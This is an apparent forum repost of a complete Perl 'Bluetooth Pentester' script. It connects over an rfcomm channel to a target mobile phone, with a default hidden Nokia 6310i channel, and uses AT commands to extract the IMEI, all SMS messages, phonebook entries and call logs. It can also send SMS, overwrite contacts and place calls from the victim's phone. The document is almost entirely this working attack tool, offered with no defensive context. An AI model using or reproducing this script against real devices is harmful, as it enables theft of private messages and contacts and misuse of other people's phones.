[转载]Small data extraction utility that is designed for bluetooth hacking
文章作者:pierre kroma[code]#!/usr/bin/perl
#
# bluetooth hacking tool
#
# written by pierre kroma
# [email]kroma@syss.de[/email]
use Device::Gsm;
use Getopt::Std;
use Term::ReadLine;
use Device::Modem;
use Term::ANSIColor;
############################ U S A G E ###################################
getopts("bcpsv", \%args);
system ("clear");
print "\nBluetooth Pentester\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";
if (!defined $args{s}) {
print qq~
Usage: perl bluetest.pl -s { -b <bt-addr> -c channel -p -v }
-b <bt-addr> = hardware address of the target bluetooth device (example: 00:11:22:33:44:55)
-c <channel> = channel
-p = ping the remote device
-s = start the script
-v = be verbose
~; exit;}
################################## D E F I N I T I O N ####################
# tools
my $hcitool="/usr/bin/hcitool";
my $l2ping ="/usr/bin/l2ping";
my $rfcomm ="/usr/bin/rfcomm";
my $lsusb = "/usr/sbin/lsusb";
my $hciconfig = "/usr/sbin/hciconfig";
my $bluefw = "/sbin/bluefw";
# variable
my $bluedev="hci0";
my $bt_addr = 0;
my $channel = $args{c};
my $i = 0;
#################### S U B R O U T I N E S #################################
sub init_adapter
{
use strict;
my $busnum = "";
my $devnum = "";
# busid 0a12:0001 = linksys USBBT100 usb bluetooth stick
my $id = `$lsusb 2>/dev/null |grep 0a12:0001`;
# more generic
# my $id = `$lsusb 2>/dev/null |grep -i bluetooth`;
if ( $id =~ /Bus (\d{3}) Device (\d{3}): ID 0a12:0001/ )
{
$busnum = $1;
$devnum = $2;
system("$bluefw usb $busnum\/$devnum");
system("$hciconfig $bluedev up");
sleep(1.5);
}
}
sub init_modem
{
$modem = new Device::Modem( port => '/dev/rfcomm0' );
if( $modem->connect( baudrate => 9600 ) ) {
# print "connected!\n";
} else {
print "sorry, cannot connect to your serial port!\n";
}
# turn off the local echo
$modem->echo(0);
}
sub searching
{
print color 'bold blue';
print "search devices\n";
print color 'reset';
my @scan = `$hcitool scan | grep -v "Scanning"`;
foreach $line (@scan)
{
print $i++;
print $line;
}
print "\n";
}
sub selecting
{
# select a device
if($args{'b'})
{
$bt_addr = $args{b};
}
else
{
$term = new Term::ReadLine 'bluetooth address reader';
my $prompt = "Enter hw-addr (example: 00:11:22:33:44:55): ";
my $OUT = $term->OUT || \*STDOUT;
$bt_addr = $term->readline($prompt);
}
}
sub ping
{
# ping the remote device
if($args{'p'})
{
# ping the remote device
print color 'bold blue';
print "\nping the remote device $bt_addr\n";
print color 'reset';
die "You must be root to use l2ping!\n" if $> != 0;
system ("$l2ping -c 5 $bt_addr");
}
}
sub binding
{
# binding a device
print color 'bold blue';
print "\n\nbind a device to $bt_addr \t\t";
print color 'reset';
if($args{'c'})
{
$channel = $args{c};
}
else
{
# setting default nokia 6310i hidden channel 17 or 18
$channel = 17;
}
system("$rfcomm release $bluedev 2>/dev/null");
sleep(2);
system("$rfcomm bind $bluedev $bt_addr $channel 2>/dev/null");
sleep(2);
# Connect to the mobile phone
# for devfs
# my $gsm = new Device::Gsm( port => '/dev/bluetooth/rfcomm/0' );
# for udev
$gsm = new Device::Gsm( port => '/dev/rfcomm0' );
if( $gsm->connect() )
{
print color 'bold green';
print "connected!\n";
print color 'reset';
}
else
{
print color 'bold red';
print "sorry, no connection with gsm phone on serial port!\n";
print color 'reset';
exit (1);
}
# Register to GSM network
$gsm->register();
}
sub manu
{
# Extract the manufacturer
my $man_name = $gsm->manufacturer();
print "manufacture: $man_name \n";
}
sub model
{
# model
my $model = $gsm->model();
print "model: $model \n";
}
sub sw
{
# software revision
$modem->atsend( 'AT+CGMR' . Device::Modem::CR );
$rev = $modem->answer();
$rev =~ s/\r//g;
$rev =~ s/OK//g;
print "software revision: \n \n $rev";
sleep(1);
}
sub imei
{
# Extract the IMEI number
my $imei = $gsm->imei();
$imei =~ s/\r//g;
$imei =~ s/OK//g;
print "IMEI: (International Mobile Equipment Identifier) = $imei \n\n";
}
sub readbook
{
print color 'bold blue';
print "\n\nextract the phonebook\n\n";
print color 'reset';
if($args{'v'})
{
print "storagelocation:";
print qq~
ME => storage: device
SM => storage: SIM-card
MT => combination of ME + SM (doesn磘 work FOR MY 6310i)
BM => storage: CB-news
~;
}
print "\nsupported storage location";
$modem->atsend( 'AT+CPMS=?' . Device::Modem::CR );
$types = $modem->answer();
$types =~ s/\r//g;
$types =~ s/\n//g;
$types =~ s/OK//g;
$types =~ s/\+CPMS//g;
print "$types \n";
print "\ncurrent phonebooksource";
$modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
$source = $modem->answer();
$source =~ s/\r//g;
$source =~ s/\n//g;
$source =~ s/OK//g;
$source =~ s/\+CPBS//g;
print $source;
print "\n\n";
print "\ncurrent used storage on device";
$command="AT+CPBS=\"ME\"";
$modem->atsend( $command . Device::Modem::CR );
$modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
$memory = $modem->answer();
$memory =~ s/\r//g;
$memory =~ s/\n//g;
$memory =~ s/OK//g;
$memory =~ s/\+CPBS//g;
print $memory;
print "\ncurrent used storage on SIM";
$command="AT+CPBS=\"SM\"";
$modem->atsend( $command . Device::Modem::CR );
$modem->atsend( 'AT+CPBS?' . Device::Modem::CR );
$source = $modem->answer();
$source =~ s/\r//g;
$source =~ s/\n//g;
$source =~ s/OK//g;
$source =~ s/\+CPBS//g;
print $source;
print "\n\n";
my $prompt = "What do you want to readout? (ME oder SM) : ";
my $OUT = $term->OUT || \*STDOUT;
$type = $term->readline($prompt);
$command = "AT+CPBS=\"$type\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
my $prompt = "starting from entry (>=0): \t ";
my $OUT = $term->OUT || \*STDOUT;
$start = $term->readline($prompt);
print "\n";
my $prompt = "ending to entry:\t\t";
my $OUT = $term->OUT || \*STDOUT;
$max = $term->readline($prompt);
print "\n";
if ( $start > $max || $start <= '0' )
{
print "oops damn f*cking long night? \n";
print "initial value <= 0? \n";
print "or initial value > final value? \n";
exit (1);
}
list_entries ();
print "\nextract last 5 dialled numbers: \n";
$command = "AT+CPBS=\"DC\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
$start=1;
$max=5;
list_entries ();
print "\nlast 5 missed calls: \n";
$command = "AT+CPBS=\"MC\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
$start=1;
$max=5;
list_entries ();
print "\nlast 5 received calls: \n";
$command = "AT+CPBS=\"RC\"";
$modem->atsend( $command . Device::Modem::CR );
$asource = $modem->answer();
$asource =~ s/\r//g;
$asource =~ s/\n//g;
$asource =~ s/OK//g;
print $asource;
$start=1;
$max=5;
list_entries ();
}
sub list_entries
{
$i = $start;
foreach $i ( $start..$max )
{
$command = "AT+CPBR=$i";
$modem->atsend( $command . Device::Modem::CR );
$entry = $modem->answer();
# format
$entry =~ s/\r//g;
$entry =~ s/\n//g;
$entry =~ s/OK//g;
# parse
# type = 145 = international format = number starts with +
# type = 129 = unknown number format = didn't start with +
( $pos, $num, $type, $tag ) = $entry =~ m/^\+CPBR: ($i),"(.+?)",(\d+),"(.+)?"\r?$/m;
$type =~ s/145/international/g;
$type =~ s/129/unknown/g;
if ( $num == '' )
{
print "entry $i: is empty \n";
}
else
{
print "entry $i: $num, $type, $tag \n";
}
}
}
sub sendsms
{
# Send a text message quickly
print color 'bold blue';
print "\n\nwrite a message (SMS)\n";
print color 'reset';
print "\n";
my $prompt = "recipient (example +4912345678): ";
my $OUT = $term->OUT || \*STDOUT;
$recipient = $term->readline($prompt);
print "\n";
my $prompt = "message: ";
my $OUT = $term->OUT || \*STDOUT;
$message = $term->readline($prompt);
my $status = $gsm->send_sms(
recipient => $recipient,
content => $message
);
if ( $status )
{
print color 'bold green';
print "\nmessage transmitted successfully.\n";
print color 'reset';
}
else
{
print color 'bold red';
print "\nERROR: message couldn`t delivered.\n" ;
print color 'reset';
}
sleep(2);
}
sub readsms
{
# Get list of device::Gsm::Sms message objects
# see `examples/read_messages.pl' for all details
# get mode status
$modem->atsend( 'AT+CMGF?' . Device::Modem::CR );
print color 'bold blue';
print "\nSMS Menu";
print color 'reset';
print "\n \ncurrent sms status (0=PDU, 1=text)";
my $status = $modem->answer();
$status =~ s/\r//g;
$status =~ s/\n//g;
$status =~ s/OK//g;
$status =~ s/\+CMGF//g;
print $status;
sleep(2);
# switch to text mode (does not work with 6310i)
# print "switch to text mode \n";
# $modem->atsend( 'AT+CMGF=1' . Device::Modem::CR );
# print $modem->answer();
print "\n\nextract all sms \n";
$modem->atsend( 'AT+CMGL=4' . Device::Modem::CR );
my $extract = $modem->answer();
$extract =~ s/OK//g;
$extract =~ s/\+CMGL://g;
sleep(2);
print $extract;
}
sub call
{
# read number
print color 'bold blue';
print "\n\nmaking a call\n";
print color 'reset';
print "\n";
my $prompt = "Which number should be called? (example: 004970714078560): ";
my $OUT = $term->OUT || \*STDOUT;
$number = $term->readline($prompt);
print "\ncalling $number \n";
my $max = 20;
if (fork)
{
$modem->dial( $number );
}
else
{
print "waiting $max seconds before ring off: ";
$i = 0;
foreach $i ( 1..$max )
{
print "$i ";
sleep(1);
}
print "\n";
$modem->hangup();
}
}
sub writebook
{
print color 'bold blue';
print "\ncreate a phonebook entry";
print color 'reset';
print "\n";
my $prompt = "storage space number (ATTENTION: you may overwrite an existing entry:): ";
my $OUT = $term->OUT || \*STDOUT;
$nr = $term->readline($prompt);
print "\n";
my $prompt = "phone-number (format +49123456789): ";
my $OUT = $term->OUT || \*STDOUT;
$tel = $term->readline($prompt);
print "\n";
my $prompt = "name: ";
my $OUT = $term->OUT || \*STDOUT;
$name = $term->readline($prompt);
print "\n";
my $prompt = "storage location (ME=device, SM=SIM): ";
my $OUT = $term->OUT || \*STDOUT;
$place = $term->readline($prompt);
$command="AT+CPBS=\"$place\"";
$modem->atsend( $command . Device::Modem::CR );
$command="AT+CPBW=$nr,\"$tel\",145,\"$name\"";
$modem->atsend( $command . Device::Modem::CR );
$source = $modem->answer();
$source =~ s/\r//g;
$source =~ s/\n//g;
$source =~ s/OK//g;
print $source;
print "\n\nchecking......";
$start = $nr - 5;
$max = 5;
if ( $start <= 0 )
{
$start = $nr;
}
$max = $nr + 5;
print "\n extract your phonebook from storage space number $start to $max \n";
list_entries ();
print "\n";
}
sub key
{
my $message = "- press any key -";
my $OUT = $term->OUT || \*STDOUT;
$term->readline($message);
}
sub final
{
#system ('cat ./logo.txt');
print color 'bold red';
print "\t\t\t\twritten by pierre kroma (kroma\@syss.de)\n\n";
print color 'reset';
$modem->disconnect();
print "\n";
}
############################# M A I N ###############################
init_adapter ();
searching ();
selecting ();
ping ();
binding ();
init_modem ();
print color 'bold blue';
print "\nextract device information\n";
print color 'reset';
manu ();
model ();
sw ();
imei ();
key();
readsms ();
sendsms ();
key ();
readbook ();
writebook ();
key ();
call ();
key ();
final ();[/code]
页:
[1]